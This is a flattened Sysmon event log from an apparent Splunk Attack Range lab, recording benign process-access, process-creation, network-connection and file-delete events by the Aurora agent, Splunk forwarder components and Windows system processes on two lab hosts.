10341000x800000000000000044595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.671{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.670{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.668{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.149{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:34.147{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000017232Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E502-63C7-1702-00000000B002}1540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017231Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017230Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017229Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017228Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017227Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017226Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017225Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017224Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017223Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017222Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E502-63C7-1702-00000000B002}1540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017221Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.388{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E502-63C7-1702-00000000B002}1540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017220Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:34.389{E5A8D418-E502-63C7-1702-00000000B002}1540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000017219Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.006{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50126-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017235Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:35.750{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6983CB7F83B715ED1D5FB98F2C3A7918,SHA256=8EBC4833A1C536DA474C4B2D3EF1C57BD39F7D39C12C970FE250FEC1E55AB5E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:35.853{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D4FA3D7FC7E681964D5B5B5A3CD33F3,SHA256=B656E00C5C475F3A5C97268440175E2A95B8217A3BBC58BBA321219CF3970842,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017234Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:35.532{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE55DB45C835D09FBEC81AA51BA31C5E,SHA256=12E039A7CAC27CF4AD540F57B608149635B786042146EF6C686647DEFF46E1E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017236Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:36.832{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33E779AF16DBB09FC3448B4B386CEB3A,SHA256=63675053664E84CB030BC2DF1228560153CDD91BCC99E225587A9FA9466F124A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:36.988{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8D0571AE54B5E37BD13F74D1D571B4C,SHA256=37E1501853A22FBCE523BA4473025536D27362BB814DF212AC0E0E68F1FC5178,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017237Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:37.905{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC3A91EE8B3C9CC3A4B7426D9763F7C0,SHA256=C1C53966103958606B31E076CB8C93832A052F28CA5AF57E5FC6A0392C96190D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017238Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:38.993{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CF8BB14263EA17E448F57368B90ADD5,SHA256=82C0CB91BF9F58F720581CC7B2486F1A2EEB7C391D25D929547E342C4A2745B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:36.628{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56395-false10.0.1.12-8000- 23542300x800000000000000044638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:38.059{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4665535F1D94AF979B4DAE3222861223,SHA256=E85B8F6F4514292375D9BD38354B27334C79B59145742B21F1E72955E264830A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:39.101{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2C2679B6B3302AC7EE4177C51C700F3,SHA256=61F214C4AA94013804C5F6243235DFC97C3EE7AD6C5B1FF38AD7AB103D251D80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017240Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:38.043{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50127-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017239Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:40.079{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4360FCA8EEE3A1668CE4A0CDD4E6E196,SHA256=89E8C02D3C5DAC4D29CECFCC115F0AAA9FCC18CB5903E57F7E2286E300BCF906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:40.140{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02B8E9D0CE7EDD5A44153682B4FD2179,SHA256=8A58873D0E7D033C57BD78D4F33F4E2BEDF51C8B45EE108B5D4B2FDAE08DCB05,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017241Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:41.172{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E736604CCE7B4C30EEDE8E24A3E690D,SHA256=EA30EF15C99550B838C0532BB3D9632461A8A7608E58AB36CD85DC0597134598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:41.178{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64628117313416D030DA521EA174B30,SHA256=173615776FD61F87CC7D42AFEA5253E1DF85C12C371636328DD513A7BB8B095E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017273Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.745{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 